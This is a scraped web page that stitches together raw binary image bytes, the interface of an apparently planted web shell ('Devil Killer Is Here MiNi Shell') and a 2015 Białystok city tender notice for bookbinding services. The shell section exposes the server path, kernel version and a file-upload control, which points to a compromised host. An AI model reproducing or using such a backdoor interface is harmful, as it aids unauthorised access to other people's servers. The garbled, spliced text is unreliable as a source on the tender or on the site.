JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151026/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151026/285546-N-2015.html

<p class="kh_header"><b>Białystok: Usługi introligatorskie dla Urzędu Miejskiego w Białymstoku w 2016 roku</b><br>
<b>Numer ogłoszenia: 285546 - 2015; data zamieszczenia: 26.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi introligatorskie dla Urzędu Miejskiego w Białymstoku w 2016 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi introligatorskie dla Urzędu Miejskiego w Białymstoku w 2016 roku. Zamówienie będzie realizowane w podziale na dwie części. Zakres zamówienia dla poszczególnych części w załączniku do ogłoszenia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.97.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty podmiotów zagranicznych:
1)jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w sekcji III.4.2 tiret 2  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2)jeżeli w kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem;
3)dokument, o którym mowa w sekcji III.4.3.1 tiret 1 lub zastępujący je dokument  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4)w przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)każdy Wykonawca zobowiązany jest złożyć oddzielnie dokument określony w sekcji III.4.2 tiret 2  oraz dokument określony w sekcji III.4.4 tiret 1;
2)oświadczenie o spełnieniu warunków udziału w postępowaniu określone w sekcji III.4.1 oraz oświadczenie o nie podleganiu wykluczeniu określone w sekcji III.4.2 tiret 1 - składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z § 12umowy dla cz. I 1.wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczane w granicach unormowania art. 144 Prawa zamówień publicznych.
2. Zamawiający dopuszcza zmianę wysokości wynagrodzenia należnego wykonawcy w przypadku zmiany stawki podatku VAT, wprowadzonej powszechnie obowiązującymi przepisami prawa.
3. Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian, o których mowa w ust. 2. 
4.  W przypadku zmiany, o której mowa w ust. 2 wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie znowelizowanych przepisów. 
5. Zmiana wynagrodzenia, o której mowa w ust. 2 może dotyczyć wyłącznie niezrealizowanej części umowy. W takim przypadku każda ze stron umowy, w terminie 15 dni od dnia wejścia w życie przepisów dokonujących tych zmian, może zwrócić się do drugiej strony o  wprowadzenie odpowiedniej zmiany wynagrodzenia. 
6. Warunkiem dokonania waloryzacji wynagrodzenia z tytułu okoliczności określonej w ust. 2 jest złożenie wniosku zawierającego uzasadnienie i szczegółowy  sposób wyliczenia ceny wraz z określeniem wpływu zmian na wynagrodzenie Wykonawcy.   

Zgodnie z § 14 umowy dla cz. II wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczane w granicach unormowania art. 144 Prawa zamówień publicznych.
2. Zamawiający dopuszcza zmianę wysokości wynagrodzenia należnego wykonawcy w przypadku zmiany stawki podatku VAT, wprowadzonej powszechnie obowiązującymi przepisami prawa.
3. Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian, o których mowa w ust. 2. 
4.  W przypadku zmiany, o której mowa w ust. 2 wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie znowelizowanych przepisów. 
5. Zmiana wynagrodzenia, o której mowa w ust. 2 może dotyczyć wyłącznie niezrealizowanej części umowy. W takim przypadku każda ze stron umowy, w terminie 15 dni od dnia wejścia w życie przepisów dokonujących tych zmian, może zwrócić się do drugiej strony o  wprowadzenie odpowiedniej zmiany wynagrodzenia. 
6. Warunkiem dokonania waloryzacji wynagrodzenia z tytułu okoliczności określonej w ust. 2 jest złożenie wniosku zawierającego uzasadnienie i szczegółowy  sposób wyliczenia ceny wraz z określeniem wpływu zmian na wynagrodzenie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białymstoku, ul. Słonimska 1, Departament Obsługi Urzędu pokój 01..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2015 godzina 08:45, miejsce: Urząd Miejski w Białymstoku, ul. Słonimska 1, Departament Obsługi Urzędu pokój 03-sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie i dostarczenie opraw introligatorskich - okładki do listów gratulacyjnych i okolicznościowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostarczenie do siedzib Zamawiającego w Białymstoku  przy  ul. Branickiego 9 i przy ul. Kilińskiego 6 opraw introligatorskich:
1) 7. 500 sztuk okładek do listów gratulacyjnych do siedziby Urzędu Stanu Cywilnego w Białymstoku przy ul. Branickiego 9 spełniających następujące wymagania:
a) Format okładek - A4 o wymiarach: 30,5 cm x 22 cm, po złożeniu; wykonane z tektury o grubości 2 mm, oklejone materiałem pokryciowym wysokiej jakości wyprodukowanym na bazie papieru pokrytego szlachetnym pvc, plastycznym, odpornym na wodę, np. novalite nr CL 11102 lub równoważne z zachowaniem faktury i koloru; wyklejone lustrami z białego kartonu 230 g/m2; wewnątrz na stronie 2 w lewym dolnym rogu i na stronie 3 w prawym dolnym rogu wklejone wstążki biało-żółto-czerwone o szerokości 15 mm, każdy z kolorów o szerokości 5 mm, umożliwiające włożenie kartki o gramaturze 240 g/m2 i wymiarach 210 mm x 297 mm. 
b) Na pierwszej stronie okładki umieszczony jest wizerunek Herbu Miasta Białegostoku o wysokości 55 mm - szerokość z proporcji, wytłoczony z folii w kolorze złotym w osi symetrii okładki, odległość między górną krawędzią okładki a wierzchołkiem herbu 55 mm. 
Dwie linie równoległe o szerokości 2 mm każda, odstęp pomiędzy liniami 1 mm tworzące obramowanie, w odległości 14 mm od krawędzi okładki. Napis BIAŁYSTOK czcionka Times New Roman, wielkość czcionki 35 pkt, wielkie litery, wytłoczony z folii w kolorze złotym w osi symetrii okładki, odległość między dolną krawędzią okładki a podstawą napisu - 25 mm. Rogi okładki proste. Dopuszczalne odchylenie od wymiarów podanych w granicach +/- 2 mm (zgodnie z załącznikiem nr 6 str. 5 do SIWZ)
 2) 1.200 sztuk okładek do listów gratulacyjnych i okolicznościowych, formatu A4 do Urzędu Miejskiego przy ul. Kilińskiego 6  w Białymstoku, w tym: 
a) 500 sztuk okładek do listów gratulacyjnych formatu A4 o wymiarach: 30,5 cm x 22 cm, po złożeniu; wykonane z tektury o grubości 2 mm, oklejone materiałem pokryciowym wysokiej jakości wyprodukowanym na bazie papieru pokrytego szlachetnym pvc, plastycznym, odpornym na wodę, np novalite nr CL 11102 lub równoważne z zachowaniem faktury i koloru; wyklejone lustrami z białego kartonu230 g/m2; wewnątrz na stronie 3 wklejona jest wstążka biało-żółto-czerwona w prawym dolnym rogu o szerokości 15 mm, każdy z kolorów o szerokości 5 mm, umożliwiająca włożenie kartki o gramaturze 240 g/m2 i wymiarach 210 mm x 297 mm. Na pierwszej stronie okładki umieszczony jest wizerunek Herbu Miasta Białegostoku o wysokości 55 mm - szerokość z proporcji, wytłoczony z folii w kolorze złotym w osi symetrii okładki, odległość między górną krawędzią okładki a wierzchołkiem herbu 45 mm. Pod herbem napis w dwóch liniach, w osi symetrii okładki, w pierwszej linii wyraz PREZYDENT, w drugiej linii MIASTA BIAŁEGOSTOKU, w odległości 20 mm od końca herbu do wierzchołka napisu. Czcionka Times New Roman, 35 pkt, wielkie litery. Odległość między wierszami 4 mm. Rogi okładki proste. Dopuszczalne odchylenie od wymiarów podanych w granicach +/- 2 mm.
b) 200 sztuk okładek do listów gratulacyjnych formatu A4 o wymiarach: 30,5 cm x 22 cm, po złożeniu; wykonane z tektury o grubości 2 mm, oklejone materiałem pokryciowym wysokiej jakości wyprodukowanym na bazie papieru pokrytego szlachetnym pvc, plastycznym, odpornym na wodę, np. novalite nr CL 11102 lub równoważne z zachowaniem faktury i koloru; wyklejone lustrami z białego kartonu230 g/m2; wewnątrz na stronie 3 wklejona jest wstążka biało-żółto-czerwona w prawym dolnym rogu o szerokości 15 mm, każdy z kolorów o szerokości 5 mm, umożliwiająca włożenie kartki o gramaturze 240 g/m2 i wymiarach 210 mm x 297 mm. Na pierwszej stronie okładki umieszczony jest wizerunek Herbu Miasta Białegostoku o wysokości 55 mm - szerokość z proporcji, wytłoczony z folii w kolorze złotym w osi symetrii okładki, odległość między górną krawędzią okładki a wierzchołkiem herbu 55 mm. Dwie linie równoległe o szerokości 2 mm każda, odstęp pomiędzy liniami 1 mm tworzące obramowanie, w odległości 14 mm od krawędzi okładki. Napis BIAŁYSTOK czcionka Times New Roman, wielkość czcionki 35 pkt, wielkie litery, wytłoczony z folii w kolorze złotym w osi symetrii okładki, odległość między dolną krawędzią okładki a podstawą napisu - 25 mm. Rogi okładki proste. Dopuszczalne odchylenie od wymiarów podanych w granicach +/- 2 mm.
c) 500 sztuk okładek do listów gratulacyjnych i dyplomów formatu A4 o wymiarach: 30,5 cm x 22 cm, po złożeniu; wykonane z tektury o grubości 2 mm, oklejone materiałem pokryciowym wysokiej jakości wyprodukowanym na bazie papieru pokrytego szlachetnym pvc, plastycznym, odpornym na wodę, np. novalite nr CL 11102 lub równoważne z zachowaniem faktury i koloru; wyklejone lustrami z białego kartonu 230 g/m2; wewnątrz na stronie 3 wklejona jest wstążka biało-żółto-czerwona w prawym dolnym rogu o szerokości 15 mm, każdy z kolorów o szerokości 5 mm, umożliwiająca włożenie kartki o gramaturze 240 g/m2 i wymiarach 210 mm x 297 mm. Na pierwszej stronie okładki umieszczony jest wizerunek Herbu Miasta Białegostoku o wysokości 55 mm - szerokość z proporcji, wytłoczony z folii w kolorze złotym w osi symetrii okładki, odległość między górną krawędzią okładki a wierzchołkiem herbu 55 mm. Napis BIAŁYSTOK czcionka Times New Roman, wielkość czcionki 35 pkt, wielkie litery, wytłoczony z folii w kolorze złotym w osi symetrii okładki, odległość między dolną krawędzią okładki a podstawą napisu - 25 mm. Rogi okładki proste. Dopuszczalne odchylenie od wymiarów podanych w granicach +/- 2 mm. Zamówienie będzie realizowane w terminie 6 miesięcy od daty podpisania umowy z zastrzeżeniem terminu dostawy pierwszej partii obejmującej 10% ilości sztuk w każdym asortymencie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.97.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres skrócenia terminu realizacji pierwszej partii - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie opraw introligatorskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie następujących opraw introligatorskich:
 1) 600 sztuk opraw dowodów zmian i wyjaśnień do dokumentów własności kat. A z Departamentu Geodezji UM w Białymstoku przy ul. Słonimskiej 2/2:
Format A4,oprawa w twardych okładkach z tektury. Zamawiający wymaga oklejenia kartonu użytego do wykonania opraw okleiną zewnętrzną, skóropodobną, wodoodporną, matową, trudnoplamiącą  z tworzywa sztucznego wysokiej jakości wyprodukowanego na bazie papieru, pokrytego pvc, plastycznego, odpornego na wodę, dającego się przetłaczać, np. typu introkal lub równoważną,  w kolorze jasnozielonym, grubość tomu: 2,5 - 3 cm. Napisy złocone na grzbiecie w następującym rozmieszczeniu: a) na górze grzbietu - rok, b) na środku grzbietu - numer obrębu: cyfry od 1-26, c) na dole grzbietu- numer zmian np. od numeru 1-50; 50-123.
2) 4 tomy dokumentacji z zakresu bezpieczeństwa z Biura Zarządzania Kryzysowego przy ul. Warszawskiej 3 pok.1 w Białymstoku:
Oprawa w formacie A4 w twardych okładkach z tektury w jednolitym kolorze (bordowy). Zamawiający wymaga oklejenia kartonu użytego do wykonania opraw okleiną zewnętrzną, skóropodobną, wodoodporną, matową, trudnoplamiącą z tworzywa sztucznego, wysokiej jakości wyprodukowanego na bazie papieru pokrytego pvc, posiadającego dużą trwałość, plastycznego, odpornego na wodę, dającego się przetłaczać, np. typu introkal lub równoważną. Na wierzchniej okładce napisy złocone, (zgodnie z załącznikiem nr 7 str. 1 do SIWZ ). Na grzbietach 4 szt. tomów napisy złocone określające numer i rok (1/2016 itd.) Na wewnętrznych stronach dwustronny nadruk. Każda księga 220 kartek.
3) 23 sztuk rejestrów praw jazdy z Departamentu Obsługi Mieszkańców przy ul. Branickiego 3/5 w Białymstoku: oprawy rejestrów praw jazdy (23 sztuk): format A4,oprawa w twardych okładkach tektury. Zamawiający wymaga oklejenia kartonu użytego do wykonania opraw okleiną zewnętrzną, skóropodobną, wodoodporną, matową, trudnoplamiącą z tworzywa sztucznego, wysokiej jakości wyprodukowanego na bazie papieru pokrytego pvc, posiadającego dużą trwałość, plastycznego, odpornego na wodę, dającego się przetłaczać, np. typu introkal lub równoważną, w kolorze niebieskim, grubość rejestrów-1,5 cm, napisy złocone, na grzbiecie: data. Na pierwszej stronie okładki: opis spraw.
4) 20 szt. ksiąg stanu cywilnego z lat poprzednich  z USC przy ul. Branickiego 9 w Białymstoku:                
20 ksiąg stanu cywilnego: format opraw: szerokość tomu 25 cm, wysokość 34,5 cm, oprawa w twardych okładkach z tektury.
 Zamawiający wymaga oklejenia kartonu użytego do wykonania opraw płótnem introligatorskim lnianym o splocie workowym o niejednorodnej powierzchni , np. typu kanafas lub równoważnym, w kolorze naturalnym, księgi w kolorach: urodzeń - zielone, małżeństw-bordowe, zgonów -granatowe, grubość tomu: 4 cm, grzbiet i narożniki okładek oprawione w płótno lniane w kolorze naturalnym (fotografie C-D), napisy na grzbiecie w kolorze czarnym w następującym rozmieszczeniu: na górze grzbietów: litery U lub M lub Z, poniżej: rok np.2013r., na wysokości 1/4 grzbietu: numery akt np : 1-500, na przedniej stronie okładki napisy w okienku o wymiarach 10,5 x 7,5 cm: w pierwszym wierszu po lewej stronie godło państwowe, napis: Urząd Stanu Cywilnego w Białymstoku, po prawej stronie: herb Białegostoku, napis w drugim wierszu: Akty Urodzeń lub Akty Małżeństw lub Akty Zgonów, napis w lewym dolnym rogu rok, odpowiednio do rocznika księgi: np. 2015 r. napis w prawym dolnym rogu: nr aktów np. : 1-500 (zgodnie z załącznikiem nr 6 str. 1-4 do SIWZ) 
3. Zamawiający wymaga ponadto od Wykonawcy dokonywania odbioru dokumentów i dostawy wykonanych opraw z i do wskazanych w  SIWZ siedzib Zamawiającego.
